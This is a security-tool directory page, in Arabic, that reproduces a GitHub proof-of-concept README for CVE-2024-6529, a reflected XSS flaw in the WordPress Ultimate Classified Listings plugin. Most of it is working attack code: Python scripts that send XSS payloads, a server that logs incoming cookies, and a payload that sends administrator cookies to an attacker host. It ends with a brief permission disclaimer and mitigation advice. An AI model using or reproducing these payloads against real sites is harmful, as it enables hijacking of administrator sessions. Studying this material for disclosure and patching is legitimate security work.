Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-6529 — إثباتات مفهوم (PoC) تُظهر ثغرة XSS المنعكسة في إضافة Ultimate Classified Listings الخاصة بووردبريس وسرقة ملفات تعريف الارتباط الخاصة بالمشرف عبر حمولات مُصمّمة وخادم تسجيل. | Kitploit
أدوات/GitHubGitHub/abdurahmon3236/cve-2024-6529
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتصيد الاحتيالياختبار الاختراقالهندسة الاجتماعية
GitHubabdurahmon3236/cve-2024-6529

CVE-2024-6529

إثباتات مفهوم (PoC) تُظهر ثغرة XSS المنعكسة في إضافة Ultimate Classified Listings الخاصة بووردبريس وسرقة ملفات تعريف الارتباط الخاصة بالمشرف عبر حمولات مُصمّمة وخادم تسجيل.

عرض المستودع
6منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إثبات المفهوم (PoC) للثغرات الأمنية في إضافات ووردبريس

يحتوي هذا المستودع على نصوص إثبات المفهوم (PoC) لثغرات أمنية مختلفة تم اكتشافها في إضافات ووردبريس متنوعة. توضح هذه النصوص كيف يمكن للمهاجمين استغلال هذه الثغرات لتنفيذ إجراءات ضارة.

Table of Contents

  • Vulnerabilities Covered
  • Setup and Usage
    • Reflected XSS in Ultimate Classified Listings Plugin
    • Stealing Cookies Using XSS
  • Important Considerations

الثغرات المغطاة

  1. XSS المنعكس عبر المواقع (XSS) في إضافة القوائم المصنفة النهائية

    • ثغرة في إضافة القوائم المصنفة النهائية لووردبريس قبل الإصدار 1.4 تسمح للمهاجمين بتنفيذ جافا سكريبت عشوائية عن طريق حقن نصوص ضارة عبر معاملات غير معقمة.
  2. سرقة الكوكيز باستخدام XSS

    • توضح كيف يمكن للمهاجم استغلال ثغرة XSS المنعكسة لسرقة كوكيز المستخدمين ذوي الصلاحيات العالية، مثل المسؤولين، عن طريق إرسال الكوكيز إلى خادم ضار.

الإعداد والاستخدام

XSS المنعكس في إضافة القوائم المصنفة النهائية

يوضح إثبات المفهوم هذا كيفية استغلال ثغرة XSS المنعكسة في إضافة القوائم المصنفة النهائية.

  1. تحديد المعامل الضعيف:

    • افترض أن المعامل الضعيف هو search في الرابط http://example.com/classifieds.
  2. صياغة رابط ضار:

    • يمكن أن يتضمن الرابط الضار حمولة لتنفيذ حوار تنبيه:
      root@kitploit:~
      http://example.com/classifieds?search=<script>alert('XSS')</script>
      
  3. تشغيل نص إثبات المفهوم:

    • احفظ النص التالي باسم xss_poc.py وقم بتشغيله.
    root@kitploit:~
    import requests
    
    # Configuration
    target_url = "http://example.com/classifieds"  # Change this to the target site's URL
    payload = "<script>alert('XSS')</script>"  # XSS payload
    
    def trigger_xss():
        # Construct the malicious URL
        malicious_url = f"{target_url}?search={payload}"
    
        # Send a GET request to the malicious URL
        response = requests.get(malicious_url)
    
        # Check if the payload is reflected in the response
        if payload in response.text:
            print("[+] XSS payload reflected in the response.")
            print("[+] Malicious URL:", malicious_url)
        else:
            print("[-] XSS payload not reflected in the response.")
    
    if __name__ == "__main__":
        trigger_xss()
    

سرقة الكوكيز باستخدام XSS

يوضح إثبات المفهوم هذا كيف يمكن للمهاجم استغلال ثغرة XSS المنعكسة لسرقة الكوكيز من المستخدمين ذوي الصلاحيات العالية.

  1. إعداد خادم ضار:

    • احفظ النص التالي باسم malicious_server.py وقم بتشغيله لبدء خادم يسجل الطلبات الواردة (بما في ذلك الكوكيز).
    root@kitploit:~
    from http.server import BaseHTTPRequestHandler, HTTPServer
    import logging
    
    class RequestHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            logging.info(f"Received request: {self.headers}")
            self.send_response(200)
            self.end_headers()
    
    def run(server_class=HTTPServer, handler_class=RequestHandler, port=8080):
        logging.basicConfig(filename='server.log', level=logging.INFO)
        server_address = ('', port)
        httpd = server_class(server_address, handler_class)
        logging.info(f'Starting server on port {port}...')
        httpd.serve_forever()
    
    if __name__ == "__main__":
        run()
    
  2. صياغة حمولة لسرقة الكوكيز:

    • قم بإنشاء حمولة ترسل كوكيز المسؤول إلى الخادم الضار:
      root@kitploit:~
      http://example.com/classifieds?search=<script>new Image().src='http://attacker.com:8080?cookie='+document.cookie;</script>
      
  3. تشغيل نص إثبات المفهوم:

    • احفظ النص التالي باسم steal_cookies_poc.py وقم بتشغيله.
    root@kitploit:~
    import requests
    
    # Configuration
    target_url = "http://example.com/classifieds"  # Change this to the target site's URL
    attacker_server = "http://attacker.com:8080"  # Change this to your malicious server's URL
    payload = f"<script>new Image().src='{attacker_server}?cookie='+document.cookie;</script>"
    
    def trigger_xss():
        # Construct the malicious URL
        malicious_url = f"{target_url}?search={payload}"
    
        # Send a GET request to the malicious URL
        response = requests.get(malicious_url)
    
        # Check if the payload is reflected in the response
        if payload in response.text:
            print("[+] XSS payload reflected in the response.")
            print("[+] Malicious URL:", malicious_url)
        else:
            print("[-] XSS payload not reflected in the response.")
    
    if __name__ == "__main__":
        trigger_xss()
    

اعتبارات مهمة

  • الأذونات: تأكد من أن لديك إذنًا صريحًا لاختبار هذه الثغرات على الموقع المستهدف. الوصول غير المصرح به غير قانوني وغير أخلاقي.
  • بيئة الاختبار: قم بإجراء هذه الاختبارات في بيئة خاضعة للتحكم لتجنب التأثير على أنظمة الإنتاج.
  • التخفيف: قم بتحديث إضافة القوائم المصنفة النهائية إلى الإصدار 1.4 أو أحدث. قم دائمًا بتعقيم وهروب مدخلات المستخدم قبل تضمينها في المخرجات.

توضح إثباتات المفهوم هذه كيف يمكن للمهاجم استغلال الثغرات في إضافات ووردبريس لتنفيذ إجراءات ضارة. حافظ دائمًا على تحديث برامجك واتبع أفضل ممارسات الأمان لمنع مثل هذه الثغرات.

تنزيل الأداة